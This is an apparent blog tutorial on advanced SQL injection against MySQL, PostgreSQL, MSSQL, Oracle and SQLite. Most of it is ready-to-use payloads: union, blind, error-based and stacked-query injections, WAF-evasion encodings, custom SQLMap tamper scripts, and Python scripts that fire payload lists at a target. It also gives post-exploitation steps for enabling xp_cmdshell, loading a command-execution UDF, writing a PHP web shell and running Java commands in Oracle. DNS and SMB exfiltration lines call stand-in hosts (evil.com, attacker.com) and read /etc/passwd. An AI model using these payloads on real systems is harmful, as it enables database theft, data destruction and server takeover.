Advanced SQLI Techniques

Advanced SQLI Techniques

WARNING: If you don't know what you are doing, please refrain from using these techniques. Improper use may harm the database.

Advanced Payloads and Techniques

Error-Based SQL Injection

Advanced Error Payloads:

  •   ' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT version()), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) -- -
    

Union-Based Injection

Determining the Number of Columns:

  •   ' UNION SELECT NULL, NULL, NULL, NULL --
    

Extracting Data:

' UNION SELECT username, password, NULL, NULL FROM users --

Blind SQL Injection

Boolean-Based Blind:

' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END) --

Time-Based Blind:

' AND IF(1=1, SLEEP(5), 0) --

Second-Order SQL Injection

  • Injection in Profile Information: Modify data stored in one place to affect queries executed elsewhere.

Advanced Union-Based SQL Injection

1. Union-Based Error Handling

Generate detailed error messages by crafting complex payloads:

' UNION SELECT 1, version(), database(), user() FROM dual WHERE 1=CAST((SELECT COUNT(*) FROM information_schema.tables) AS INT) --

2. Union with Hex Encoding

Encode parts of your query to evade WAFs:

' UNION SELECT 1, 0x62656e6368, 0x70617373776f7264, user() --

3. Multi-Query Union Injection

Leverage multiple queries to extract more data:

' UNION SELECT 1, database(), (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()), user() --

4. Union-Based Cross Database Extraction

Combine data from different databases (when supported):

' UNION SELECT 1, (SELECT column_name FROM db1.table1 LIMIT 1), (SELECT column_name FROM db2.table2 LIMIT 1), user() --

Advanced Boolean-Based SQL Injection

Time-Based Boolean Injection with Conditional Responses

Use time delays to infer data based on conditional responses:

' AND IF((SELECT LENGTH(database()))>5, SLEEP(5), 0) --

Nested Boolean Injections

Nest conditions to extract specific data:

' AND IF((SELECT SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1), 1, 1))='a', SLEEP(5), 0) --

Error-Based Boolean Injection

' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())>5, (SELECT table_name FROM information_schema.tables), 1) --

4. Using Bitwise Operations

Use bitwise operations for more obfuscation and complexity:

' AND IF((SELECT ASCII(SUBSTRING((SELECT database()),1,1))) & 1, SLEEP(5), 0) --

Combining Techniques

Combine multiple advanced techniques for robust and harder-to-detect payloads.

Example: Union with Time-Based Injection

Create a payload that uses both union and time-based injections:

' UNION SELECT IF((SELECT LENGTH(database()))>5, SLEEP(5), 0), 1, user(), 4 --

Example: Nested Union and Boolean Injection

Combine nested boolean conditions with union-based data extraction:

' UNION SELECT 1, IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())>5, (SELECT table_name FROM information_schema.tables LIMIT 1), 1), 3, 4 --

Automating with Custom Scripts

Automate these advanced techniques using custom scripts to efficiently test and extract data.

Example: Python Script for Advanced Union Injection

import requests

url = "http://example.com/vulnerable.php"
payloads = [
    # Advanced Union-Based Injections
    "' UNION SELECT 1, version(), database(), user() FROM dual WHERE 1=CAST((SELECT COUNT(*) FROM information_schema.tables) AS INT) -- ",
    "' UNION SELECT 1, 0x62656e6368, 0x70617373776f7264, user() -- ",
    "' UNION SELECT 1, database(), (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()), user() -- ",
    "' UNION SELECT 1, (SELECT column_name FROM db1.table1 LIMIT 1), (SELECT column_name FROM db2.table2 LIMIT 1), user() -- ",
    # Advanced Boolean-Based Injections
    "' AND IF((SELECT LENGTH(database()))>5, SLEEP(5), 0) -- ",
    "' AND IF((SELECT SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1), 1, 1))='a', SLEEP(5), 0) -- ",
    "' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())>5, (SELECT table_name FROM information_schema.tables), 1) -- ",
    "' AND IF((SELECT ASCII(SUBSTRING((SELECT database()),1,1))) & 1, SLEEP(5), 0) -- ",
    # Combined Techniques
    "' UNION SELECT IF((SELECT LENGTH(database()))>5, SLEEP(5), 0), 1, user(), 4 -- ",
    "' UNION SELECT 1, IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())>5, (SELECT table_name FROM information_schema.tables LIMIT 1), 1), 3, 4 -- ",
]

for payload in payloads:
    response = requests.get(url, params={"id": payload})
    print(f"Payload: {payload}")
    print(f"Response: {response.text}\n")

Advanced Enumeration

Database Fingerprinting

MySQL:

' OR 1=1 AND @@version --

PostgreSQL:

' OR 1=1 AND version() --

MSSQL:

' OR 1=1 AND @@version --

Column Enumeration

Determine the Number of Columns:

' ORDER BY 1 -- 
' ORDER BY 2 --

Extract Column Names:

' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users' --

Advanced Data Extraction

Combine Multiple Rows into a Single Output:

' UNION SELECT GROUP_CONCAT(username, 0x3a, password) FROM users --

Bypassing Filters and WAFs

Obfuscation

Using Comments:

' UNION/**/SELECT/**/NULL,NULL,NULL --

Case Manipulation

Changing the Case of SQL Keywords:

' uNioN SeLecT NULL, NULL --

Inline Comments

Inserting Inline Comments:

' UNION/**/SELECT/**/NULL,NULL --

Whitespace Manipulation

Using Different Types of Whitespace Characters:

' UNION%0D%0ASELECT%0D%0A NULL,NULL --

Exploiting Advanced Scenarios

Stored Procedures

Execute Arbitrary SQL:

'; EXEC xp_cmdshell('whoami') --

Out-of-Band SQL Injection

Exfiltrate Data via DNS or HTTP Requests:

'; EXEC master..xp_dirtree '\\evil.com\payload' --

Leveraging Privileges

Reading or Writing Files:

' UNION SELECT LOAD_FILE('/etc/passwd') --

Automation and Custom Scripts

Custom SQLMap Commands

Bypass WAFs or Target Specific Injection Points:

sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=space2comment --level=5 --risk=3

Some Tamper Scripts I use

tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

Creating Your Own Tamper Script

Creating your own tamper script for SQLMap involves writing a Python script that modifies the payloads used by SQLMap to evade web application firewalls (WAFs) or other filtering mechanisms. Here is a step-by-step guide to create a custom tamper script.

Step 1: Understand the Basics of a Tamper Script

A tamper script modifies the payload sent to the server. The script should contain a function called tamper that takes a payload string as an argument and returns the modified payload string.

Step 2: Structure of a Tamper Script

Here is the basic structure of a tamper script:

#!/usr/bin/env python

import random

__priority__ = 1

def dependencies():
    pass

def tamper(payload):
    # Modify the payload here
    modified_payload = payload
    return modified_payload

__priority__: Defines the order in which tamper scripts are applied.

  • dependencies(): Checks for any required dependencies.

  • tamper(payload): The main function that modifies the payload.

Step 3: Implement a Simple Tamper Script

Let's create a simple tamper script that replaces spaces with comments to evade basic filters.

Example: Space-to-Comment Tamper Script

#!/usr/bin/env python

import random

__priority__ = 1

def dependencies():
    pass

def tamper(payload):
    """
    Replaces space character (' ') with a random inline comment ('/**/')
    """
    if payload:
        payload = payload.replace(" ", "/**/")
    return payload

Step 4: More Advanced Example

Now, let's create a more advanced tamper script that randomly URL-encodes characters in the payload.

Example: Random URL Encoding Tamper Script

#!/usr/bin/env python

import random

__priority__ = 1

def dependencies():
    pass

def tamper(payload):
    """
    Randomly URL encodes characters in the payload
    """
    if payload:
        encoded_payload = ""
        for char in payload:
            if random.randint(0, 1):
                encoded_payload += "%%%02x" % ord(char)
            else:
                encoded_payload += char
        return encoded_payload
    return payload

Step 5: Save and Use the Tamper Script


  1. Save the Script
    : Save your tamper script in the tamper directory of your SQLMap installation. For example, save it as random_urlencode.py.

  2. Use the Script: Use the --tamper option in SQLMap to apply your custom tamper script.

     sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=random_urlencode
    

    Step 6: Testing and Debugging

    Test: Ensure the script works as intended by running SQLMap with different payloads.

    Debug: Print debug information if necessary. You can add print statements within the tamper function to debug your script.

Debugging Example

#!/usr/bin/env python

import random

__priority__ = 1

def dependencies():
    pass

def tamper(payload):
    """
    Randomly URL encodes characters in the payload
    """
    if payload:
        encoded_payload = ""
        for char in payload:
            if random.randint(0, 1):
                encoded_payload += "%%%02x" % ord(char)
            else:
                encoded_payload += char
        print(f"Original: {payload}")
        print(f"Modified: {encoded_payload}")
        return encoded_payload
    return payload

Some More Techniques

Stacked Queries

Executing Multiple Statements:

'; DROP TABLE users; SELECT * FROM admin --

SQLi with Web Application Firewalls

Using Obfuscated Payloads:

' UNION SELECT CHAR(117,115,101,114,110,97,109,101), CHAR(112,97,115,115,119,111,114,100) --

Leveraging SQL Functions

Using SQL Functions for Data Exfiltration:

' UNION SELECT version(), current_database() --

DNS Exfiltration

Using DNS Requests for Data Exfiltration:

'; SELECT load_file('/etc/passwd') INTO OUTFILE '\\\\attacker.com\\share' --

Leveraging JSON Functions

Extracting Data Using JSON Functions:

' UNION SELECT json_extract(column_name, '$.key') FROM table_name --

Advanced Automation Techniques

SQLMap Customization

Using Custom Tamper Scripts:

sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=~/location/ofthescript/charencode.py --level=5 --risk=3

WAF Bypass Techniques for SQL Injection

1. Using Encoding and Obfuscation

URL Encoding

Encode parts of the payload to bypass basic keyword detection.

%27%20UNION%20SELECT%20NULL,NULL,NULL--

Double URL Encoding

Double encode the payload to evade detection mechanisms.

%2527%2520UNION%2520SELECT%2520NULL,NULL,NULL--

Hex Encoding

Use hexadecimal encoding for the payload.

' UNION SELECT 0x61646D696E, 0x70617373776F7264 --

2. Case Manipulation and Comments

Mixed Case

Change the case of SQL keywords.

' uNioN SeLecT NULL, NULL --

Inline Comments

Insert comments within SQL keywords to obfuscate the payload.

' UNION/**/SELECT/**/NULL,NULL --

3. Whitespace and Special Characters

Using Different Whitespace Characters

Replace spaces with other whitespace characters like tabs or newlines.

' UNION%0D%0ASELECT%0D%0A NULL,NULL --

Concatenation with Special Characters

Use special characters and concatenation to build the payload dynamically.

' UNION SELECT CHAR(117)||CHAR(115)||CHAR(101)||CHAR(114), CHAR(112)||CHAR(97)||CHAR(115)||CHAR(115) --

4. SQL Function and Command Obfuscation

String Concatenation

Break strings into smaller parts and concatenate them.

' UNION SELECT 'ad'||'min', 'pa'||'ss' --

Using SQL Functions

Leverage SQL functions to manipulate the payload.

' UNION SELECT VERSION(), DATABASE() --

5. Time-Based and Boolean-Based Payloads

Time-Based Blind SQL Injection

Use time delays to infer information from the response.

' AND IF(1=1, SLEEP(5), 0) --

Boolean-Based Blind SQL Injection

Use conditions that alter the response based on true or false conditions.

' AND IF(1=1, 'A', 'B')='A' --

6. Advanced Encoding Techniques

Base64 Encoding

Encode payloads using Base64.

' UNION SELECT FROM_BASE64('c2VsZWN0IHZlcnNpb24oKQ==') --

Custom Encoding Scripts

Create custom scripts to encode and decode payloads in different formats.

7. Chaining Techniques

Combining Multiple Bypass Techniques

Use a combination of techniques to create a more complex and harder-to-detect payload.

%27%20UNION/**/SELECT/**/CHAR(117)%7C%7CCHAR(115)%7C%7CCHAR(101)%7C%7CCHAR(114),%20CHAR(112)%7C%7CCHAR(97)%7C%7CCHAR(115)%7C%7CCHAR(115)%20--%0A

8. Leveraging Lesser-Known SQL Features

Using JSON Functions

Leverage JSON functions to manipulate and extract data.

' UNION SELECT json_extract(column_name, '$.key') FROM table_name --

Using XML Functions

Utilize XML functions to create more complex payloads.

' UNION SELECT extractvalue(1, 'version()') --

Techniques to Force Errors from Databases for SQL Injection

Forcing errors in databases can help reveal valuable information about the underlying SQL queries, database structure, and sometimes even the data itself. Here are some advanced techniques to force errors from various databases:

1. Syntax Errors

Classic Syntax Error

Introduce a deliberate syntax error to elicit an error message.

' OR 1=1; --

Unclosed Quotes

Leave a quote unclosed to generate an error.

' OR 'a'='a

2. Type Conversion Errors

Invalid Type Casting

Cast a string to an integer to cause a type conversion error.

' UNION SELECT CAST('abc' AS SIGNED) --

3. Function-Based Errors

Division by Zero

Force a division by zero error.

' UNION SELECT 1/0 --

Invalid Function Usage

Use a function incorrectly to trigger an error.

' UNION SELECT EXP('abc') --

4. Subquery Errors

Invalid Subquery

Use a subquery in a way that causes an error.

' UNION SELECT (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2) AS temp) --

5. Database-Specific Errors

MySQL Errors

Use invalid queries to trigger MySQL-specific errors.

' UNION SELECT GTID_SUBSET('abc', 'def') --

PostgreSQL Errors

' UNION SELECT TO_NUMBER('abc', '999') --

MSSQL Errors

' UNION SELECT CONVERT(INT, 'abc') --

6. Information Schema Queries

Invalid Table Name

Query the information schema with an invalid table name.

' UNION SELECT table_name FROM information_schema.tables WHERE table_name = 'non_existent_table' --

7. Blind SQL Injection Errors

Deliberate False Condition

Use a false condition to force an error indirectly.

' AND 1=(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='non_existent_database') --

8. Advanced Error Techniques

Recursive Queries

Use recursive queries to force errors.

' UNION SELECT 1 FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4) AS temp WHERE temp=1 --

Invalid Hexadecimal Values

Use invalid hexadecimal values to trigger errors.

' UNION SELECT 0xZZ --

9. Combining Techniques

Chained Error Forcing

Combine multiple error-forcing techniques for more robust results.

' UNION SELECT CONVERT(INT, 'abc') UNION SELECT 1/0 UNION SELECT TO_NUMBER('abc', '999') --

Techniques to Force Errors from Databases for SQL Injection

Below are some advanced and rare SQL injection techniques for MSSQL, MySQL, and Oracle. These techniques go beyond the basic ones and exploit specific features and configurations of the databases.

MSSQL

OLE Automation Procedures

DECLARE @Object INT;
EXEC sp_OACreate 'WScript.Shell', @Object OUTPUT;
EXEC sp_OAMethod @Object, 'Run', NULL, 'cmd.exe /c whoami > C:\output.txt';

XP_CMD Shell with Privilege Escalation

This enables xp_cmdshell to execute system commands if it's not already enabled.

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

Linked Servers

EXEC sp_addlinkedserver 'attacker_server';
EXEC sp_addlinkedsrvlogin 'attacker_server', 'false', NULL, 'username', 'password';
EXEC ('xp_cmdshell ''net user''') AT attacker_server;

MySQL

UDF (User Defined Functions) for Remote Command Execution

This technique involves creating a UDF to execute system commands.

CREATE TABLE foo(line BLOB);
INSERT INTO foo VALUES (LOAD_FILE('/usr/lib/lib_mysqludf_sys.so'));
SELECT * FROM foo INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id > /tmp/out; chown mysql.mysql /tmp/out');

DNS Exfiltration

This exfiltrates data through DNS requests to an attacker-controlled domain.

SELECT LOAD_FILE(CONCAT('\\\\', (SELECT table_name FROM information_schema.tables LIMIT 0,1), '.attacker.com\\a'));

Binary Log Injections

This exploits the binary log feature to write a web shell.

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

Oracle

Java Procedures for Command Execution

EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute' );
EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '' );
EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '' );

CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "cmd" AS
import java.io.*;
public class cmd {
   public static String run(String cmd) {
      try {
         StringBuffer output = new StringBuffer();
         Process p = Runtime.getRuntime().exec(cmd);
         BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
         String line = "";
         while ((line = reader.readLine())!= null) {
            output.append(line + "\n");
         }
         return output.toString();
      } catch (Exception e) {
         return e.toString();
      }
   }
};
/

CREATE OR REPLACE FUNCTION run_cmd(p_cmd IN VARCHAR2) RETURN VARCHAR2
AS LANGUAGE JAVA
NAME 'cmd.run(java.lang.String) return java.lang.String';
/

SELECT run_cmd('id') FROM dual;

Advanced Methods to Forcefully Generate Errors on Various DBMS

Here are some advanced techniques that specific to some DBMS to force errors and gather valuable information. By using these advanced methods to force errors on different DBMS, you can gather detailed error messages that reveal valuable information about the database, helping you identify and exploit SQL injection vulnerabilities more effectively.

MySQL

Use of Invalid Functions

MySQL provides many functions that, when used incorrectly, can generate errors.

' AND EXP(~(SELECT * FROM (SELECT 1) t)) --

Invalid Hexadecimal Conversion

Using invalid hexadecimal values can cause errors.

' AND 0xG1 --

Subqueries in SELECT Clause

Use subqueries that return multiple rows in a single value context.

' AND (SELECT * FROM (SELECT 1,2) t) = 1 --

PostgreSQL

Invalid Regular Expression

PostgreSQL's regex functions can be used incorrectly to cause errors.

' AND 'a' ~ 'b[' --

Invalid JSON Operations

Use JSON functions with invalid operations.

' AND jsonb_path_query_first('{"a":1}', '$.a') --

Recursive CTE

Use recursive Common Table Expressions (CTE) incorrectly.

' AND WITH RECURSIVE t AS (SELECT 1 UNION ALL SELECT 1 FROM t) SELECT * FROM t --

MSSQL

Invalid XML Queries

MSSQL’s XML functions can generate errors when used with invalid XML.

'; DECLARE @xml XML; SET @xml = '<root><a></a><b></b></root>'; SELECT @xml.value('(/root/c)[1]', 'INT') --

Invalid Data Conversion

Conversion functions can cause errors when converting incompatible data types.

'; SELECT CAST('text' AS INT) --

SQL Injection with Error Functions

Use built-in error functions to generate errors.

'; RAISERROR('Error generated', 16, 1) --

Oracle

Invalid Data Manipulation

Oracle’s specific functions and data manipulation can cause errors.

' UNION SELECT UTL_INADDR.get_host_address('invalid_host') FROM dual --

Invalid XMLType Usage

Use XMLType improperly to cause errors.

' UNION SELECT XMLType('<invalid><xml>') FROM dual --

Using SYS.DBMS_ASSERT

Leverage Oracle’s assertion package to force errors

' UNION SELECT SYS.DBMS_ASSERT.noop('invalid_input') FROM dual --

SQLite

Invalid String Functions

SQLite’s string functions can generate errors when used improperly.

' UNION SELECT SUBSTR('text', -1, 1) --

Invalid Mathematical Operations

Use mathematical functions with invalid inputs.

' UNION SELECT POW('text', 2) --

Invalid Date Functions

Use date functions with incorrect parameters.

' UNION SELECT DATE('invalid_date') --

Python Script to Force Errors

Automating Error Injection

import requests

url = "http://example.com/vulnerable.php"
payloads = [
    # MySQL
    "' AND EXP(~(SELECT * FROM (SELECT 1) t)) -- ",
    "' AND 0xG1 -- ",
    "' AND (SELECT * FROM (SELECT 1,2) t) = 1 -- ",
    # PostgreSQL
    "' AND 'a' ~ 'b[' -- ",
    "' AND jsonb_path_query_first('{'a':1}', '$.a') -- ",
    "' AND WITH RECURSIVE t AS (SELECT 1 UNION ALL SELECT 1 FROM t) SELECT * FROM t -- ",
    # MSSQL
    "; DECLARE @xml XML; SET @xml = '<root><a></a><b></b></root>'; SELECT @xml.value('(/root/c)[1]', 'INT') -- ",
    "; SELECT CAST('text' AS INT) -- ",
    "; RAISERROR('Error generated', 16, 1) -- ",
    # Oracle
    "' UNION SELECT UTL_INADDR.get_host_address('invalid_host') FROM dual -- ",
    "' UNION SELECT XMLType('<invalid><xml>') FROM dual -- ",
    "' UNION SELECT SYS.DBMS_ASSERT.noop('invalid_input') FROM dual -- ",
    # SQLite
    "' UNION SELECT SUBSTR('text', -1, 1) -- ",
    "' UNION SELECT POW('text', 2) -- ",
    "' UNION SELECT DATE('invalid_date') -- ",
]

for payload in payloads:
    response = requests.get(url, params={"id": payload})
    print(f"Payload: {payload}")
    print(f"Response: {response.text}\n")

Extracting Database Name and Hostname Using Forced Errors

These advanced error-based SQL injection techniques, you can extract crucial information such as the database name and hostname, which can further aid in your exploitation efforts.

MySQL

Extracting Database Name

Use error-based injection to extract the database name.

' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) --

Extracting Hostname

Use error-based injection to extract the hostname.

' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT @@hostname), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) --

PostgreSQL

Extracting Database Name

Use error-based injection to extract the current database name.

' AND 1=CAST((SELECT current_database()) AS INT) --

Extracting Hostname

PostgreSQL does not directly provide a function for hostname, but you can use other metadata queries or built-in extensions like inet_server_addr.

' AND 1=CAST((SELECT inet_server_addr()) AS INT) --

MSSQL

Extracting Database Name

Use error-based injection to extract the current database name.

'; SELECT 1 WHERE 1=CAST(DB_NAME() AS INT) --

Extracting Hostname

Use error-based injection to extract the server hostname.

'; SELECT 1 WHERE 1=CAST(@@servername AS INT) --

Oracle

Extracting Database Name

Use error-based injection to extract the current database name.

' UNION SELECT NULL FROM dual WHERE 1=CAST((SELECT ora_database_name FROM dual) AS INT) --

Extracting Hostname

Use error-based injection to extract the hostname.

' UNION SELECT NULL FROM dual WHERE 1=CAST((SELECT SYS_CONTEXT('USERENV', 'HOST') FROM dual) AS INT) --

SQLite

Extracting Database Name

SQLite uses a single database per file, but you can force errors to reveal database-related information.

' AND 1=CAST((SELECT name FROM sqlite_master WHERE type='table' LIMIT 1) AS INT) --

Extracting Hostname

SQLite does not inherently have a hostname since it’s a file-based database. However, you can infer file paths which might give clues.

Python Script to Automate the Process

import requests

url = "http://example.com/vulnerable.php"
payloads = [
    # MySQL
    "' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) -- ",
    "' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT @@hostname), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) -- ",
    # PostgreSQL
    "' AND 1=CAST((SELECT current_database()) AS INT) -- ",
    "' AND 1=CAST((SELECT inet_server_addr()) AS INT) -- ",
    # MSSQL
    "; SELECT 1 WHERE 1=CAST(DB_NAME() AS INT) -- ",
    "; SELECT 1 WHERE 1=CAST(@@servername AS INT) -- ",
    # Oracle
    "' UNION SELECT NULL FROM dual WHERE 1=CAST((SELECT ora_database_name FROM dual) AS INT) -- ",
    "' UNION SELECT NULL FROM dual WHERE 1=CAST((SELECT SYS_CONTEXT('USERENV', 'HOST') FROM dual) AS INT) -- ",
    # SQLite
    "' AND 1=CAST((SELECT name FROM sqlite_master WHERE type='table' LIMIT 1) AS INT) -- ",
    "' AND 1=CAST((SELECT file FROM pragma_database_list LIMIT 1) AS INT) -- ",
]

for payload in payloads:
    response = requests.get(url, params={"id": payload})
    print(f"Payload: {payload}")
    print(f"Response: {response.text}\n")

Okay, we've reached the end of this article. Thank you very much for getting here.

https://beacons.ai/morganbinbash